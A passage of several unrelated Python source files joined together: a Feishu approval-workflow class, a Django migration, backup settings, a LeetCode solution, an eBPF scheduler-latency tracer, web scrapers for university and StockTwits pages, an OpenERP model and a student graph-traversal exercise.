logger.error("Feishu check status approval fail! result={0},instance_code={1},oper{2},error by {3}"
.format(result, instance_code, oper, ex))
raise FeishuException(ex)
class FeishuApproval(FeiShu):
"""้ฃไนฆๅฎกๆนๅ
ฌๅ
ฑ็ฑป๏ผๆไพๆคๅใๅๆใๆ็ปๆฅๅฃ,ไธ่ฝๅ็ฌไฝฟ็จ๏ผไธบๆฅๅฃ็ฑป"""
def revoke_apply(self, instance_code=None, approval_code=None, companyid=None):
"""
ๆคๅๅฎกๆน
:param instance_code:
:return:
"""
user_id_info = self.get_user_id_info(companyid)
feishu_result = self.approval_revoke(
approval_code,
instance_code,
user_id_info['user_id']
)
return feishu_result
def get_approval_content(self, instance_code):
"""
่ทๅๅฎกๆนๅ
ๅฎน
:param instance_code: ๅฎกๆนไปปๅกid
:return:
"""
approval_info = self.get_approval_info(instance_code)
for obj in approval_info['timeline']:
if 'comment' in obj.keys():
return obj['comment']
return ''
def get_leader_comment(self,approval_info=None):
"""
่ทๅๅฎกๆนๆต้ขๅฏผ่ฏ่ฎบ
:param instance_code: ๅฎกๆนไปปๅกid
:return:
"""
# if approval_info:
# approval_info = self.get_approval_info(instance_code)
task_id=''
for obj in approval_info['task_list']:
if obj['node_name']=='้ขๅฏผๅฎกๆน' and obj['status'] in ['APPROVED','REJECTED']:
task_id=obj['id']
break
for obj in approval_info['timeline']:
if 'task_id' in obj.keys() and obj['task_id']==task_id:
if 'comment' in obj.keys():
return obj['comment']
return ''
def get_ops_comment(self, instance_code=None, approval_info=None):
"""
่ทๅๅฎกๆนๆต่ฟ็ปด่ฏ่ฎบ
:param instance_code: ๅฎกๆนไปปๅกid
:return:
"""
if instance_code:
approval_info = self.get_approval_info(instance_code)
task_id = ''
for obj in approval_info['task_list']:
if obj['node_name'] == '่ฟ็ปดๅฎกๆน' and obj['status'] in ['APPROVED', 'REJECTED']:
task_id = obj['id']
break
for obj in approval_info['timeline']:
if 'task_id' in obj.keys() and obj['task_id'] == task_id:
if 'comment' in obj.keys():
return obj['comment']
return ''
class FeishuCapacityAndEmergencyApproval(FeishuApproval):
"""
้ฃไนฆๆฉๅฎนๅฎกๆนๆตๆไฝ็ฑป
"""
def create_apply(self, capacity_obj=None, emergency_obj=None, unit_capacity_objs=None,
leader=None, user_code=None, app_approval=None, app_approval_detail=None):
"""
ๅๅปบๅฎกๆน็ณ่ฏท
"""
FS_PLUS_CAPACITY_APPROVAL_CODE = current_app.config["FS_PLUS_CAPACITY_APPROVAL_CODE"]
FS_REDUCE_CAPACITY_APPROVAL_CODE = current_app.config["FS_REDUCE_CAPACITY_APPROVAL_CODE"]
FS_EMERGENCY_RELEASE_APPROVAL_CODE = current_app.config["FS_EMERGENCY_RELEASE_APPROVAL_CODE"]
user_id_info = self.get_user_id_info(user_code)
value = ""
if capacity_obj:
# ๆฉๅฎนๅๆฏ
if capacity_obj.capacity_kind == 0:
approval_code = FS_PLUS_CAPACITY_APPROVAL_CODE.get("approval_code")
approval_node_id = FS_PLUS_CAPACITY_APPROVAL_CODE.get("approval_node_id")
for unit_capacity in unit_capacity_objs:
unit_capacity_blue_now = unit_capacity.now_blue_instance - unit_capacity.blue_instance if unit_capacity.now_blue_instance is not None and unit_capacity.blue_instance is not None else 0
unit_capacity_green_now = unit_capacity.now_green_instance - unit_capacity.green_instance if unit_capacity.now_green_instance is not None and unit_capacity.green_instance is not None else 0
unit_capacity_gray_now = unit_capacity.now_gray_instance - unit_capacity.gray_instance if unit_capacity.now_gray_instance is not None and unit_capacity.gray_instance is not None else 0
value += "ๅๅ
{}({}): \n่็ป็ฐๆๅฎไพๆฐ: {}๏ผๆฉๅฎนๆฐ: {};" \
"\n็ปฟ็ป็ฐๆๅฎไพๆฐ: {}๏ผๆฉๅฎนๆฐ: {};" \
"\n็ฐ็ป็ฐๆๅฎไพๆฐ: {}๏ผๆฉๅฎนๆฐ: {}\n\n".format(unit_capacity.unit, "ๆฉๅฎน",
unit_capacity.blue_instance if unit_capacity.blue_instance else 0,
unit_capacity_blue_now,
unit_capacity.green_instance if unit_capacity.green_instance else 0,
unit_capacity_green_now,
unit_capacity.gray_instance if unit_capacity.gray_instance else 0,
unit_capacity_gray_now)
if capacity_obj.app_type == 0:
deploy_type = FS_PLUS_CAPACITY_APPROVAL_CODE.get("form_info").get("deploy_type").get('k8s')
else:
deploy_type = FS_PLUS_CAPACITY_APPROVAL_CODE.get("form_info").get("deploy_type").get('dvd')
# ็ผฉๅฎนๅๆฏ
else:
approval_code = FS_REDUCE_CAPACITY_APPROVAL_CODE.get("approval_code")
approval_node_id = FS_REDUCE_CAPACITY_APPROVAL_CODE.get("approval_node_id")
for unit_capacity in unit_capacity_objs:
unit_capacity_blue_now = unit_capacity.blue_instance - unit_capacity.now_blue_instance if unit_capacity.now_blue_instance is not None and unit_capacity.blue_instance is not None else 0
unit_capacity_green_now = unit_capacity.green_instance - unit_capacity.now_green_instance if unit_capacity.now_green_instance is not None and unit_capacity.green_instance is not None else 0
unit_capacity_gray_now = unit_capacity.gray_instance - unit_capacity.now_gray_instance if unit_capacity.now_gray_instance is not None and unit_capacity.gray_instance is not None else 0
value += "ๅๅ
{}({}): \n่็ป็ฐๆๅฎไพๆฐ: {}๏ผ็ผฉๅฎนๆฐ: {};" \
"\n็ปฟ็ป็ฐๆๅฎไพๆฐ: {}๏ผ็ผฉๅฎนๆฐ: {};" \
"\n็ฐ็ป็ฐๆๅฎไพๆฐ: {}๏ผ็ผฉๅฎนๆฐ: {}\n\n".format(unit_capacity.unit, "็ผฉๅฎน",
unit_capacity.blue_instance if unit_capacity.blue_instance else 0,
# unit_capacity.blue_instance - unit_capacity.now_blue_instance,
unit_capacity_blue_now,
unit_capacity.green_instance if unit_capacity.green_instance else 0,
# unit_capacity.green_instance - unit_capacity.now_green_instance,
unit_capacity_green_now,
unit_capacity.gray_instance if unit_capacity.gray_instance else 0,
# unit_capacity.gray_instance - unit_capacity.now_gray_instance
unit_capacity_gray_now
)
if capacity_obj.app_type == 0:
deploy_type = FS_REDUCE_CAPACITY_APPROVAL_CODE.get("form_info").get("deploy_type").get('k8s')
else:
deploy_type = FS_REDUCE_CAPACITY_APPROVAL_CODE.get("form_info").get("deploy_type").get('dvd')
# ๆๅปบ่กจๅ
form_data = [{"id": "module_code", "type": "input", "value": capacity_obj.app_name},
{"id": "capacity_text", "type": "textarea", "value": value},
{"id": "deploy_type", "type": "radioV2", "value": deploy_type},
{"id": "apply_reason", "type": "textarea", "value": capacity_obj.apply_reason}]
elif emergency_obj:
approval_code = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("approval_code")
approval_node_id = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("approval_node_id")
leader_approval = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("form_info").get("approval_type").get(
'leader_approval')
custome_approval = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("form_info").get("approval_type").get(
'custome_approval')
if emergency_obj.app_type == 0:
deploy_type = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("form_info").get("deploy_type").get('k8s')
else:
deploy_type = FS_EMERGENCY_RELEASE_APPROVAL_CODE.get("form_info").get("deploy_type").get('dvd')
if leader:
approval_type = custome_approval
else:
approval_type = leader_approval
form_data = [{"id": "module_code", "type": "input", "value": emergency_obj.app_name},
{"id": "deploy_type", "type": "radioV2", "value": deploy_type},
{"id": "approval_type", "type": "radioV2", "value": approval_type},
{"id": "timerange", "type": "dateInterval", "value": {
"start": datetime.strftime(emergency_obj.cd_start_time, "%Y-%m-%dT%H:%M:%S+08:00"),
"end": datetime.strftime(emergency_obj.cd_end_time, "%Y-%m-%dT%H:%M:%S+08:00"),
"interval": 4.0}},
{"id": "apply_reason", "type": "textarea", "value": emergency_obj.apply_reason}]
elif app_approval:
approval_node_id = None
approval_code = current_app.config["FS_APP_DETAIL_APPROVAL_CODE"].get("approval_code")
form_data = self.handle_app_approval(app_approval_detail)
else:
raise TypeError("ๅฟ
้กปๆปก่ถณๆฉ็ผฉๅฎน/็ดงๆฅๅๅธไปปๆไธ็งๆจกๅผ")
if leader:
feishu_result = self.approval_create(approval_code,
user_id_info['user_id'],
form_data,
approval_user_id=leader,
approval_node_id=approval_node_id)
else:
feishu_result = self.approval_create(approval_code,
user_id_info['user_id'],
form_data)
return feishu_result
def handle_app_approval(self, data):
# ๆๅปบ่กจๅ
value = ""
old_value = ""
for _data in data.get("deploymentConfig"):
value += f"ๅๅ
{_data.get('zone')}่็ปไธชๆฐ{_data.get('blue')}, ็ปฟ็ปไธชๆฐ{_data.get('green')}, ็ฐ็ปไธชๆฐ{_data.get('gray')}\n"
for _old_data in data.get("old_deployment"):
old_data = data['old_deployment'][_old_data]
old_value += f"ๅๅ
{_old_data}่็ปไธชๆฐ{old_data.get('blue')}, ็ปฟ็ปไธชๆฐ{old_data.get('green')}, ็ฐ็ปไธชๆฐ{old_data.get('gray')}\n"
form_data = [{"id": "version_type", "type": "input", "value": data.get("versionType")},
{"id": "env", "type": "input", "value": data.get("Environment")},
{"id": "code", "type": "input", "value": data.get("code")},
{"id": "all_specs", "type": "input", "value": data.get("resourceName")},
{"id": "old_all_specs", "type": "input", "value": data.get("old_resource_name")},
{"id": "apply_reason", "type": "textarea", "value": value},
{"id": "old_apply_reason", "type": "textarea", "value": old_value}]
return form_data
|
# Generated by Django 3.1.3 on 2021-01-12 07:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('programmes', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='programme',
name='bullets',
field=models.TextField(default='null', null=True),
),
]
|
"""
Default Backup Settings
"""
### INCLUDES ###
import os
import string
from py_knife.ordered_dict import OrderedDict
### CONSTANTS ###
## Default Backup Settings ##
# TODO: Add 'MUTLIPLE_TAPE_SYSTEM' to parser
DEFAULT_SETTINGS = OrderedDict()
DEFAULT_SETTINGS['crone_schedule'] = '0 22 * * 1-5'
DEFAULT_SETTINGS['vmrun_path'] = 'vmrun'
DEFAULT_SETTINGS['vms_path'] = os.path.join(os.path.expanduser('~'), 'vmware')
if os.name == 'nt':
# Guessing backup media
available_drives = ['%s:' % d for d in string.ascii_uppercase if os.path.exists('%s:' % d)]
DEFAULT_SETTINGS['tape_path'] = os.path.abspath(available_drives[-1])
MUTLIPLE_TAPE_SYSTEM = False
else:
# FIXME: Would this work on MAC?
DEFAULT_SETTINGS['tape_path'] = os.path.join(os.path.abspath(os.sep), 'media', 'lto6')
MUTLIPLE_TAPE_SYSTEM = True
DEFAULT_SETTINGS['_backup_ts'] = ''
# Time Stamp Option 1: Allow user to change time stamps (Comment those out for Option 2)
DEFAULT_SETTINGS['folder_ts_format'] = '-%Y%m%d'
DEFAULT_SETTINGS['log_ts_format'] = '%Y-%m-%d %H:%M:%S'
# Time Stamp Option 2: Do not allow user to change time stamps
FOLDER_TS_FORMAT = '-%Y%m%d'
LOG_TS_FORMAT = '%Y-%m-%d %H:%M:%S'
|
#
# @lc app=leetcode.cn id=383 lang=python3
#
# [383] ่ต้ไฟก
#
# @lc code=start
class Solution:
def canConstruct(self, ransomNote: str, magazine: str) -> bool:
from re import subn
for letter in ransomNote:
magazine, s = subn(letter, '', magazine, 1)
if s != 1:
return False
else:
return True
# @lc code=end
|
#!/usr/bin/python
from __future__ import print_function
from bcc import BPF
from time import sleep, strftime
bpf_text = """
#include <uapi/linux/ptrace.h>
struct key_t {
u32 cpu;
u32 pid;
u32 tgid;
};
BPF_HASH(start, struct key_t);
BPF_HASH(dist, struct key_t);
int pick_start(struct pt_regs *ctx)
{
u64 ts = bpf_ktime_get_ns();
u64 pid_tgid = bpf_get_current_pid_tgid();
struct key_t key;
key.cpu = bpf_get_smp_processor_id();
key.pid = pid_tgid;
key.tgid = pid_tgid >> 32;
start.update(&key, &ts);
return 0;
}
int pick_end(struct pt_regs *ctx)
{
u64 ts = bpf_ktime_get_ns();
u64 pid_tgid = bpf_get_current_pid_tgid();
struct key_t key;
u64 *value;
u64 delta;
key.cpu = bpf_get_smp_processor_id();
key.pid = pid_tgid;
key.tgid = pid_tgid >> 32;
value = start.lookup(&key);
if (value == 0) {
return 0;
}
delta = ts - *value;
start.delete(&key);
dist.increment(key, delta);
return 0;
}
"""
b = BPF(text=bpf_text)
b.attach_kprobe(event="pick_next_task_fair", fn_name="pick_start")
b.attach_kretprobe(event="pick_next_task_fair", fn_name="pick_end")
dist = b.get_table("dist")
print("%-6s%-6s%-6s%-6s" % ("CPU", "PID", "TGID", "TIME(ns)"))
while (1):
try:
sleep(1)
for k, v in dist.items():
print("%-6d%-6d%-6d%-6d" % (k.cpu, k.pid, k.tgid, v.value))
dist.clear()
except KeyboardInterrupt:
exit()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 19 11:57:01 2015
@author: bitjoy.net
"""
from bs4 import BeautifulSoup
import urllib.request
import xml.etree.ElementTree as ET
import re
import configparser
def get_news_pool(root, start, end):
news_pool = []
for i in range(start,end,-1):
page_url = ''
if i != start:
page_url = root +'_%d.shtml'%(i)
else:
page_url = root + '.shtml'
try:
response = urllib.request.urlopen(page_url)
except Exception as e:
print("-----%s: %s-----"%(type(e), page_url))
continue
html = response.read()
soup = BeautifulSoup(html,"lxml") # http://www.crummy.com/software/BeautifulSoup/bs4/doc.zh/
td = soup.find('td', class_="newsblue1")
a = td.find_all('a')
span = td.find_all('span')
for i in range(len(a)):
date_time = span[i].string
url = a[i].get('href')
title = a[i].string
news_info = ['2016-'+date_time[1:3]+'-'+date_time[4:-1]+':00',url,title]
news_pool.append(news_info)
return(news_pool)
def crawl_news(news_pool, min_body_len, doc_dir_path, doc_encoding):
i = 1
for news in news_pool:
try:
response = urllib.request.urlopen(news[1])
except Exception as e:
print("-----%s: %s-----"%(type(e), news[1]))
continue
html = response.read()
soup = BeautifulSoup(html,"lxml") # http://www.crummy.com/software/BeautifulSoup/bs4/doc.zh/
try:
body = soup.find('div', class_ = "text clear").find('div').get_text()
except Exception as e:
print("-----%s: %s-----"%(type(e), news[1]))
continue
if '//' in body:
body = body[:body.index('//')]
body = body.replace(" ", "")
if len(body) <= min_body_len:
continue
doc = ET.Element("doc")
ET.SubElement(doc, "id").text = "%d"%(i)
ET.SubElement(doc, "url").text = news[1]
ET.SubElement(doc, "title").text = news[2]
ET.SubElement(doc, "datetime").text = news[0]
ET.SubElement(doc, "body").text = body
tree = ET.ElementTree(doc)
tree.write(doc_dir_path + "%d.xml"%(i), encoding = doc_encoding, xml_declaration = True)
i += 1
if __name__ == '__main__':
#baseurl='http://pg.njupt.edu.cn/2018/0903/c1079a132310/page.htm'#46ไธชๅฏผๅธ
baseurl='http://pg.njupt.edu.cn/2018/0903/c1080a132292/page.htm' #ไธ็ก93ไธชๅฏผๅธ
tutors_pool=[]
response = urllib.request.urlopen(baseurl)
html = response.read()
soup = BeautifulSoup(html, "lxml")
body=soup.find('div',class_="wp_articlecontent")
a=body.find_all('a')
span=body.find_all('span')
for i in range(len(a)):
title = span[i].string
url = a[i].get('href')
name = a[i].string
tutor_info = [name, url]
tutors_pool.append(tutor_info)
i = 1
for tutor in tutors_pool:
response = urllib.request.urlopen(tutor[1])
html = response.read()
soup = BeautifulSoup(html, "lxml")
title=soup.select('#container_content > table > tbody > tr:nth-of-type(2) > td > table > tbody > tr:nth-of-type(3) > td > table > tbody > tr > td > table > tbody > tr > td:nth-of-type(2) > table > tbody > tr:nth-of-type(7) > td:nth-of-type(2)')
body1=soup.select('#container_content > table > tbody > tr:nth-of-type(2) > td > table > tbody > tr:nth-of-type(3) > td > table > tbody > tr > td > p:nth-of-type(4)')
body2=soup.select('#container_content > table > tbody > tr:nth-of-type(2) > td > table > tbody > tr:nth-of-type(3) > td > table > tbody > tr > td > p:nth-of-type(6)')
title1=title[0].get_text()
title2=title[0].get('align')
doc_dir_path ='../data/news/'
doc_encoding = 'utf-8'
doc = ET.Element("doc")
ET.SubElement(doc, "id").text = "%d" % (i)
ET.SubElement(doc, "url").text = tutor[1]
ET.SubElement(doc, "title").text = tutor[0]
ET.SubElement(doc, "datetime").text = '2018-09-12'
# ET.SubElement(doc, "title1").text = title[0].get_text()
ET.SubElement(doc, "body").text = body1[0].get_text()
# ET.SubElement(doc, "body2").text = body2[0].get_text()
tree = ET.ElementTree(doc)
tree.write(doc_dir_path + "%d.xml" % (i), encoding=doc_encoding, xml_declaration=True)
i += 1
print('done!')
|
/Users/Di/anaconda/lib/python2.7/sre_parse.py |
from Bio import Entrez
handle = open('pubmed_result_tighe.xml')
records = Entrez.parse(handle)
for record in records:
print(record['MedlineCitation']['Article']['ArticleTitle'])
#
|
import re
import json
import sys
import os
from datetime import date
from datetime import datetime
#========= external package==========
from bs4 import BeautifulSoup
import requests
import pandas as pd
from utils import retrieve_symb_list
from utils import make_folder
def replacebill(testo):
outfloat = testo
if 't' in testo:
outfloat = float(re.findall("\d+\.\d+", testo)[0]) * 1000
if 'b' in testo:
outfloat = float(re.findall("\d+\.\d+", testo)[0])
if 'm' in testo:
outfloat = float(re.findall("\d+\.\d+", testo)[0]) / 1000
if 'k' in testo:
outfloat = float(re.findall("\d+\.\d+", testo)[0]) / 1000000
return outfloat
def stock_twits(tick, jsondataprint = False, fulllist = False):
'''
:param tick: STOCK MARKET
:return: list with value of [_industry, _volumechange, _sentimentChange, _52wk_High, _Mkt_Cap],
list with column names
'''
url = 'https://stocktwits.com/symbol/' + tick
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html.parser')
# ==================================================================
try:
foundam_list = [i.text for i in soup.select(".st_2LcBLI2")]
_Mkt_Cap = foundam_list[5]
_Mkt_Cap = replacebill(_Mkt_Cap)
except:
_Mkt_Cap = 0
# ==================================================================
script = soup.find_all("script")
pattern = re.compile('window.INITIAL_STATE = {.*};')
# initialize jsonString
jsonString = {}
for e in script:
for i in e:
strObj = str(i)
match = pattern.search(strObj)
if match:
jsonString = match.group(0).split("window.INITIAL_STATE = "
)[1][:-1].encode('utf8').decode('unicode_escape')
jsonData = json.loads(jsonString, strict=False)
if jsondataprint == True: print(jsonData)
# print(jsonData)
# print(jsonData['stocks']['inventory'])
def nested_main(jsonData, key_value):
''''
def usata per cercare i key value nel tree del json
'''
list = [0]
try:
def nested(jsonData, key_value):
for i in jsonData:
if i == key_value:
list.append(jsonData[i])
elif key_value in str(jsonData[i]):
nested(jsonData[i], key_value)
nested(jsonData, key_value)
returnval = list[-1]
except:
returnval = 0
return returnval
_sentimentChange = nested_main(jsonData, "sentimentChange")
_volumechange = nested_main(jsonData, "volumeChange")
_industry = nested_main(jsonData, "industry")
_datetime = nested_main(jsonData, "dateTime")
_52wk_High = nested_main(jsonData, "highPriceLast52Weeks")
_totalDebt = nested_main(jsonData, "totalDebt")
_grossIncomeMargin = nested_main(jsonData, "grossIncomeMargin")
_totalEnterpriseValue = nested_main(jsonData, "totalEnterpriseValue")
_averageDailyVolumeLastMonth = nested_main(jsonData, "averageDailyVolumeLastMonth")
_dividendPayoutRatio = nested_main(jsonData, "dividendPayoutRatio")
_sharesHeldByInstitutions = nested_main(jsonData, "sharesHeldByInstitutions")
_numberOfEmployees = nested_main(jsonData, "numberOfEmployees")
_dividendExDate = nested_main(jsonData, "dividendExDate")
_earningsGrowth = nested_main(jsonData, "earningsGrowth")
_extendedHoursPercentChange = nested_main(jsonData, "extendedHoursPercentChange")
_averageDailyVolumeLast3Months = nested_main(jsonData, "averageDailyVolumeLast3Months")
_previousClose = nested_main(jsonData, "previousClose")
_previousCloseDate = nested_main(jsonData, "previousCloseDate")
_averageDailyVolumeLast3Months = nested_main(jsonData, "averageDailyVolumeLast3Months")
_bookValuePerShare = nested_main(jsonData, "bookValuePerShare")
_priceToBook = nested_main(jsonData, "priceToBook")
_totalLiabilities = nested_main(jsonData, "totalLiabilities")
_50DayMovingAverage = nested_main(jsonData, "50DayMovingAverage")
_pegratio = nested_main(jsonData, "pegRatio")
_dividendYieldSecurity = nested_main(jsonData, "dividendYieldSecurity")
_open = nested_main(jsonData, "open")
_peratio = nested_main(jsonData, "peRatio")
list_out = [_datetime, _industry, _volumechange, _sentimentChange, _52wk_High, _Mkt_Cap,
_peratio, _pegratio, _previousCloseDate]
for i,e in enumerate(list_out):
try:
list_out[i] = float(e)
except:
try:
list_out[i] = datetime.strptime(e, '%Y-%m-%d %H:%M:%S')
except:
try:
list_out[i] = datetime.strptime(e, '%Y-%m-%d')
except:
pass
columnsame = ['_datetime', '_industry', '_volumechange', '_sentimentChange', '_52wk_High', '_Mkt_Cap',
'_peratio', '_pegratio', '_previousCloseDate']
if fulllist == True:
list_out.extend([_dividendYieldSecurity, _50DayMovingAverage, _totalLiabilities,
_50DayMovingAverage, _totalLiabilities, _priceToBook, _bookValuePerShare,
_averageDailyVolumeLast3Months, _averageDailyVolumeLast3Months, _earningsGrowth,
_dividendExDate, _numberOfEmployees, _sharesHeldByInstitutions, _dividendPayoutRatio,
_averageDailyVolumeLastMonth, _totalEnterpriseValue, _totalDebt])
columnsame.extend(['_dividendYieldSecurity', '_50DayMovingAverage', '_totalLiabilities',
'_50DayMovingAverage', '_totalLiabilities', '_priceToBook', '_bookValuePerShare',
'_averageDailyVolumeLast3Months', '_averageDailyVolumeLast3Months', '_earningsGrowth',
'_dividendExDate', '_numberOfEmployees', '_sharesHeldByInstitutions', '_dividendPayoutRatio',
'_averageDailyVolumeLastMonth', '_totalEnterpriseValue', '_totalDebt'])
else:
pass
# aggiusta tipologia di dato
for i,e in enumerate(list_out):
try:
list_out[i] = float(e)
except:
try:
list_out[i] = datetime.strptime(e, '%Y-%m-%d %H:%M:%S')
except:
try:
list_out[i] = datetime.strptime(e, '%d/%m/%Y %H:%M:%S')
except:
try:
list_out[i] = datetime.strptime(e, '%Y-%m-%d')
except:
pass
# run when in debugging mode
if jsondataprint == True:
for i,e in enumerate(list_out):
print('\n',columnsame[i],' ',list_out[i], type(list_out[i]))
else:
pass
return list_out, columnsame
def stock_twits_create_df(stock, jsondataprint=False, fulllist = False):
list_out, columnsame = stock_twits(stock, jsondataprint=jsondataprint, fulllist=fulllist)
df = pd.DataFrame([list_out], columns=columnsame, index=[stock])
return df
def export_hdf_stocktwits(symb):
'''
Salva tutti gli stock nella lista symb in un unico file df-st.h5
:param symb: รจ una lista
:return: nothing
'''
for n, i in enumerate(symb):
try:
dfo = stock_twits_create_df(i).reset_index()
dfo.to_hdf('./DB-COM/df-st.h5', key=i, mode='a')
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(i, "Failed to store stocktwits hdf5: ", e, exc_type, fname, exc_tb.tb_lineno)
def export_csv_stocktwits(symb, fulllist = False):
'''
Salva tutti gli stock nella lista symb in un unico file df-st.h5
dfo = una riga per stock, con tutti i webscraped data
:param symb: รจ una lista
:return: a dataframe with the last stocktwits
'''
df_all_comb = pd.DataFrame({})
for n, i in enumerate(symb):
try:
dfo = stock_twits_create_df(i, fulllist = fulllist)
# per il primo ciclo
if df_all_comb.shape[1] < 1:
df_all_comb = dfo
else:
df_all_comb = pd.concat([df_all_comb, dfo])
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(i, "Failed to store stocktwits csv : ", e, exc_type, fname, exc_tb.tb_lineno)
df_all_comb.to_csv('./DB-COM/'+str(date.today())+'stock_twits.csv')
return df_all_comb
def test_stocktwits():
'''
Test the functionality otuput print dfo
'''
dfo = stock_twits_create_df('AAPL',jsondataprint = True, fulllist = True)
print(dfo)
def run_backup():
symb = retrieve_symb_list()
export_csv_stocktwits(symb, fulllist = True)
run_backup() |
from openerp.osv import fields, osv
from openerp import api
class invoice_csnumber(osv.osv):
_inherit = 'account.analytic.account'
_columns = {
'cs_number': fields.related('partner_id', 'cs_number', type='char', size=12, string='CS Number', readonly=True),
'branch_code': fields.related('partner_id','branch_code',type='char',string='Branch Code',readonly=True),
'bank_code': fields.related('partner_id','bank_code',type='char',string='Bank Code',readonly=True),
'address': fields.related('partner_id','street',type='char',string='Address',readonly=True),
'city': fields.related('partner_id','city',type='char',string='City',readonly=True),
}
|
import time
"""
Simple graph implementation
"""
from util import Stack, Queue # These may come in handy
class Graph:
"""Represent a graph as a dictionary of vertices mapping labels to edges."""
def __init__(self,vertices = {}):
self.vertices = vertices
def add_vertex(self, vertex_id):
"""
Add a vertex to the graph.
"""
self.vertices[vertex_id] = set()
def add_edge(self, v1, v2):
"""
Add a directed edge to the graph.
"""
try:
if self.vertices[v1] or self.vertices[v2]:
# I just need the compiler to check that both exist before I modify either
pass
self.vertices[v1].add(v2)
except KeyError:
print('one of the vertexes does not exist')
# TODO Make it print the exact vertex that doesn't exist
def get_neighbors(self, vertex_id):
"""
Get all neighbors (edges) of a vertex.
"""
return self.vertices[vertex_id]
def bft(self, starting_vertex):
"""
Print each vertex in breadth-first order
beginning from starting_vertex.
"""
q = [starting_vertex]
seen = [starting_vertex]
while len(q)>=1:
neighbors = self.get_neighbors(q[0])
for i in neighbors:
if i in seen:
pass
else:
q.append(i)
seen.append(i)
del q[0] # can I use pop instead? would it be more efficient?/ pythonic?
print(seen)
return seen
# TODO
# right now this algorithm doesn't scale. A hash table would help it scale
# (the seen wouldn't take as long to complete)
# The other way to improve this algorithm would be to see
# if you can use pointers instead of the pop(0) operation.
# if you can then it won't take as long to perform the "pop" from the q
def dft(self, starting_vertex):
"""
Print each vertex in depth-first order
beginning from starting_vertex.
"""
stack = [starting_vertex]
seen = [starting_vertex]
current = starting_vertex
output = []
while len(stack)>0:
current = stack.pop()
output.append(current)
neighbors = self.get_neighbors(current)
for i in neighbors:
if i in seen:
pass
else:
stack.append(i)
seen.append(i)
print(output)
return output
# TODO refactor/ go over logic again.
def dft_recursive(self, starting_vertex, seen= None):
"""
Print each vertex in depth-first order
beginning from starting_vertex.
This should be done using recursion.
"""
if seen == None: # first loop?
seen = set()
neighbors = self.get_neighbors(starting_vertex)
no_new_neighbors = True
for i in neighbors:
if i in seen:
pass
else:
no_new_neighbors = False
break
if no_new_neighbors:
return seen, [starting_vertex] # [seen] [output]
# if there are no neighbors, or
# if all the neighbors have been seen
# return a value to the function above
# else return the result of calling the d
# function on
stack = [starting_vertex]
seen.add(starting_vertex)
for i in neighbors:
if i in seen:
pass
else:
seen.add(i)
sub_seen, out = self.dft_recursive(i,seen)
seen | sub_seen
stack.extend(out)
print(seen,stack)
return seen, stack
# TODO second pass on this algorithm to better understand it
# track the points in time when the tradeoff of information occurs
# between specific calls of the algorithm both down and up.
def bfs(self, starting_vertex, destination_vertex):
"""
Return a list containing the shortest path from
starting_vertex to destination_vertex in
breath-first order.
"""
# every time you extend teh region of breadth first search
# have each node point to a parent. When you hit the thing you are looking
# for trace parents to generate sequence.
nbrs = self.get_neighbors(starting_vertex)
dv = destination_vertex
q = list(nbrs)
parents = {}
for i in q:
parents[i] = starting_vertex
# index = 0
while len(q) > 0:
current = q.pop(0)
children = self.get_neighbors(current)
for child in children:
if child == dv:
parents[child] = current
q = []
break
try:
if parents[child]:
continue
except KeyError:
parents[child] = current
q.append(child)
# print(index,q,parents)
# index += 1
# time.sleep(1)
sequence = [dv]
current = dv
while current != starting_vertex:
current = parents[current]
sequence.append(current)
sequence.reverse()
return sequence
# maybe while neighbors isn't empty instead
# for i in nbrs:
# add its neighbors to the q
# for each neighbor make the parent i (in the dictionary)
# if one of the neibors is the dv
# add to parents and break
# current = next in q
# get rid of first item in q
# outside while
# reverse sequence =[]
# while parents[dv] != starting_vertex
# parent = parents[dv]
# reverse seq.append(parent)
# dv = parent
pass
# TODO
def dfs(self, starting_vertex, destination_vertex):
"""
Return a list containing a path from
starting_vertex to destination_vertex in
depth-first order.
"""
nbrs = self.get_neighbors(starting_vertex)
dv = destination_vertex
q = list(nbrs)
parents = {}
for i in q:
parents[i] = starting_vertex
# index = 0
while len(q) > 0:
current = q.pop()
children = self.get_neighbors(current)
for child in children:
if child == dv:
parents[child] = current
q = []
break
try:
if parents[child]:
continue
except KeyError:
parents[child] = current
q.append(child)
# print(index,q,parents)
# index += 1
# time.sleep(1)
sequence = [dv]
current = dv
while current != starting_vertex:
current = parents[current]
sequence.append(current)
sequence.reverse()
return sequence
# keep track of current sequence
# stack = []
# sequence = []
# current = starting_vertex
# while True:
# if current == destination_vertex:
# break
# nbrs = self.get_neighbors(current)
# stack.extend(nbrs)
# current = stack.pop()
#
pass # TODO
def dfs_recursive(self, starting_vertex, destination_vertex, sequence=None):
"""
Return a list containing a path from
starting_vertex to destination_vertex in
depth-first order.
This should be done using recursion.
"""
if sequence == None:
sequence = [starting_vertex]
if starting_vertex == destination_vertex:
return sequence
nbrs = self.get_neighbors(starting_vertex)
for nbr in nbrs:
if nbr in sequence:
continue
tmp = sequence + [nbr]
val = self.dfs_recursive(nbr,destination_vertex,tmp)
# When I finally get a value I need to break out of the
# recursion so my normal case has to recognize that it
# should return the answer upwards
# until its out of the recursion.
if val == 0:
continue
else:
return val
return 0
# if current == destination
# return the sequence
# else
# traverse the tree on the neighbors you haven't seen.
if __name__ == '__main__':
graph = Graph() # Instantiate your graph
# https://github.com/LambdaSchool/Graphs/blob/master/objectives/breadth-first-search/img/bfs-visit-order.png
graph.add_vertex(1)
graph.add_vertex(2)
graph.add_vertex(3)
graph.add_vertex(4)
graph.add_vertex(5)
graph.add_vertex(6)
graph.add_vertex(7)
graph.add_edge(5, 3)
graph.add_edge(6, 3)
graph.add_edge(7, 1)
graph.add_edge(4, 7)
graph.add_edge(1, 2)
graph.add_edge(7, 6)
graph.add_edge(2, 4)
graph.add_edge(3, 5)
graph.add_edge(2, 3)
graph.add_edge(4, 6)
'''
Should print:
